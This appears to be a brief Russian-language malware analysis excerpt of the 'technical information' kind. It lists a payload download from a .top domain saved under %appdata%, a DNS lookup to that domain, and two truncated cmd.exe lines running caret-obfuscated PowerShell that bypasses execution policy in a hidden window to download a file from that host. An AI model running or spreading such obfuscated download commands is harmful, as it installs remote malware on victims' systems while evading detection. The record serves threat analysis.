Техническая информация
- http://trendsnonstop.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^W^E^R^S^HelL.exe^ -Exe^Cu^T^io^N^poL^ICY B^Y^paS^S -N^o^PR^O^FiLe^ -WI^NDO^WStyLe^ ^Hi^DdeN^ (^neW-o^bJEcT S^ys^tEM^.^N^eT.we^bclI^eNT)^.^d^O^wNLo^adfil^E('http://trendsnonstop...
- DNS ASK tr####nonstop.top
- '<SYSTEM32>\cmd.exe' /c "PO^W^E^R^S^HelL.exe^ -Exe^Cu^T^io^N^poL^ICY B^Y^paS^S -N^o^PR^O^FiLe^ -WI^NDO^WStyLe^ ^Hi^DdeN^ (^neW-o^bJEcT S^ys^tEM^.^N^eT.we^bclI^eNT)^.^d^O^wNLo^adfil^E('http://trendsnonstop...' (со скрытым окном)